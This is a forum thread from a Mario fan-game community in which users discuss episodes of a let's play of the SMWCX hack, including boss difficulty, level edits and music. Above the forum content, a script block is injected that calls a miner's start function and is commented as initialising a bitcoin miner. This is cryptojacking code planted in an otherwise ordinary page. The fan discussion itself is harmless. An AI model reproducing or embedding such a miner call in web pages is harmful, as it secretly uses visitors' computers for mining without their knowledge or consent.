<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

SMWCX - Credits

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
strongbadman

Re: SMWCX - Syrup Castle

Postby strongbadman » 3 years ago

I just don't think it's reasonable for a world 4 boss to be a "you can;t make any mistakes" deal.

Lejes

Postby Lejes » 3 years ago

Yeah, Bowser's Funtime Spike Chute was pretty bad. Still wouldn't make my top 3 worst bosses for this episode.

cozyduck

Postby cozyduck » 3 years ago

So I had found the level design of this game up to this point to be very underwhelming outside of maybe one or two levels, but todays offerings were solid. Hopefully this is a sign of things to come.

TaviTurnip
Reach for the top
Abministrator
First name: Rena

Re: SMWCX - Darklands

Postby TaviTurnip » 3 years ago

I reeeally liked today's ghost house! (And apparently many people in the comments did too, so I feel I don't even have to explain why.)

I also really love that song, but that's just more ASMT memory crawling in for me.
Don't bother fighting if you don't intend to win.

Nimono

Postby Nimono » 3 years ago

I was heavily amused at how after the whole level played music from a Tetris game, one of its secret stars has...Tetris! how fitting.

mysterypersonofwin

Postby mysterypersonofwin » 3 years ago

There is a life farm in Silver Tanks. Just throw a shell to the right of the cannon Mario is above in this picture:
life farm.PNG
life farm.PNG (275.67 KiB) Viewed 2190 times

TaviTurnip
Reach for the top
Abministrator

Re: SMWCX - Bubbly Clouds

I can't help but get into "this is a contest I am going to talk about each level like a contest" mode :S I'm not doing it on purpose.

I really liked the Kirby level though and I like it a lot when levels are totally graphic swapped like that and you have to guess the original enemy type. I don't know if I remember Bowser 3's fireballs being that scary, though? The sword graphic might be bigger than the fireball but that didn't seem the same to me. Normally jumping the fireballs isn't that worrisome.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 3 years ago

all collabs get better as they go along! for some reason
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Imaynotbehere4long
Gone, but...yeah, pretty much forgotten.

Postby Imaynotbehere4long » 3 years ago

TaviTurnip wrote:I don't know if I remember Bowser 3's fireballs being that scary, though? The sword graphic might be bigger than the fireball but that didn't seem the same to me. Normally jumping the fireballs isn't that worrisome.
Not only are they bigger, but they were also sped up.
My SMBX portfolio:
(includes a Sonic 3D Blast styled level.)

SOMEONE ANSWER MY CRY FOR HELP: http://www.supermariobrosx.org/forums/v ... =69&t=2026

FrozenQuills
undefinable flair 2019

Postby FrozenQuills » 3 years ago

thank god that boss in the orange level was changed from the tower of biased X version
it used to be just throwing bombs at meta-knight-reskinned-smb3-bowser and it took forever lol; this is a lot better and creative
SMBX Tileset Compiler and Separator
The boss entry that made me eat a shoe.

5th place counter: 5
(SMBX Forums CC11, SMBX Forums CC12, Endgame Madness Contest, SMWC Kaizo Contest 2016, SMWC 24hr Contest 2018)

alleightbits
START PLAY!
First name: Brian

Re: SMWCX - Midgar

Postby alleightbits » 3 years ago

That was a surprisingly straightforward level there. I expected worse from four stars.

TaviTurnip
Reach for the top
Abministrator

There's no video yet

EVERYONE PANIC

Truhan
Lord of the Waifus
Pronouns: Waifulord

Postby Truhan » 3 years ago

TaviTurnip wrote:There's no video yet

EVERYONE PANIC
*panic intensifies*
Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

Grounder

Postby Grounder » 3 years ago

Did you set the timer wrong, raocow?
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 3 years ago

my fault, setting error, fixed
the chillaxest of dragonsImage
ImageImage

TaviTurnip
Reach for the top
Abministrator

Re: SMWCX - Snow Land

Definitely the HARDESTT WROST TIME SWOTCH LEVEL IVE EVRE ESEEEEN!!

All of today's levels were cool D: Also it's hard to say no to the Mt. Pyre theme.

Stink Terios

Postby Stink Terios » 3 years ago

That level isn't remotely hard, maybe Darkonius was thinking about something else...?

Imaynotbehere4long
Gone, but...yeah, pretty much forgotten.

Postby Imaynotbehere4long » 3 years ago

Stink Terios wrote:That level isn't remotely hard, maybe Darkonius was thinking about something else...?
Actually, the only levels Darkonius made for SMWCX were Galoomba Plains and Clockwork Ruins. All I can think of is that he saw that his level was different and got really paranoid.

To those wondering what was different:

1) The parts where the player has to hit the time switches were way too short, most forcing the player to wait for 3/4ths of the time the time switch is active (and waiting = boring = not fun). Those parts weren't even modified that much; I just made them last longer so the player wouldn't have to wait so long, often combining two different runs and still having time left over in testing.

2) I made the boss EASIER. Having to grab a Yoshi egg before it hatches as well as avoiding a deadweight NPC that looks nearly identical to the eggs, ON TOP OF JUMPHURT=1 BOB-OMS?? Seriously, Darknoius, what were you thinking?? Plus, the fourth phase had a Thwomp attached to the boss, which had a very high chance of hurting players before they even realize what's going on (since they'll have to jump and throw the egg up to the boss).
My SMBX portfolio:
(includes a Sonic 3D Blast styled level.)

SOMEONE ANSWER MY CRY FOR HELP: http://www.supermariobrosx.org/forums/v ... =69&t=2026

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 3 years ago

Imaynotbehere4long wrote:Having to grab a Yoshi egg before it hatches as well as avoiding a deadweight NPC that looks nearly identical to the eggs, ON TOP OF JUMPHURT=1 BOB-OMS?? Seriously, Darknoius, what were you thinking?? Plus, the fourth phase had a Thwomp attached to the boss, which had a very high chance of hurting players before they even realize what's going on (since they'll have to jump and throw the egg up to the boss).
That's... literally Cuckoo Condor, from Wario Land 4 (well, both phases merged together). That was an explicit reference that got changed! Like, the only way it could be more cuckoo condor is if it alternated between dropping and throwing saws as well.
BOB is an acronym for BOB is Only BOB etc.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 3 years ago

BobisOnlyBob wrote:
Imaynotbehere4long wrote:Having to grab a Yoshi egg before it hatches as well as avoiding a deadweight NPC that looks nearly identical to the eggs, ON TOP OF JUMPHURT=1 BOB-OMS?? Seriously, Darknoius, what were you thinking?? Plus, the fourth phase had a Thwomp attached to the boss, which had a very high chance of hurting players before they even realize what's going on (since they'll have to jump and throw the egg up to the boss).
That's... literally Cuckoo Condor, from Wario Land 4 (well, both phases merged together). That was an explicit reference that got changed! Like, the only way it could be more cuckoo condor is if it alternated between dropping and throwing saws as well.
Huh! I actually was going to say "oh man looks like raocow fought cuckoo condor again" or something but wow i was spot on
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

aterraformer

Re: SMWCX - Sunset Hill Zone

Postby aterraformer » 3 years ago

I need to know the music of the first level of today's video, thanks!
raocow wrote:the plan is to wait for Jump to be released and then replacing the graphics without telling anyone involved with Jump.

SAJewers
hi

Postby SAJewers » 3 years ago

aterraformer wrote:I need to know the music of the first level of today's video, thanks!

ImageImageImageImageImage
ImageImageImageImage

heycallmeZe

Postby heycallmeZe » 3 years ago

SAJewers wrote:
aterraformer wrote:I need to know the music of the first level of today's video, thanks!

Huh. For some reason I thought it came from Xenoblade or something.

(Update: Composers were ACE. Possibly related to ACE+?)

I welcome the day a Western game composer can pull this kind of music off easily.
One day, an image will return

aterraformer

Postby aterraformer » 3 years ago

SAJewers wrote:

Thank you!
raocow wrote:the plan is to wait for Jump to be released and then replacing the graphics without telling anyone involved with Jump.

Money

Re: SMWCX - Windy Hill Zone

Postby Money » 3 years ago

I disagree with the idea that the secret exit was out of place, it was still using the levels "through line" gimmick of double-jump based platforming, but added the gimmick of beat blocks on top as a twist to it. In fact, if I have one complaint about this level (besides the finicky hops over munchers sometimes not being high enough) it's that the second half was really just more of the same stuff the first half was.

Return to “let's play”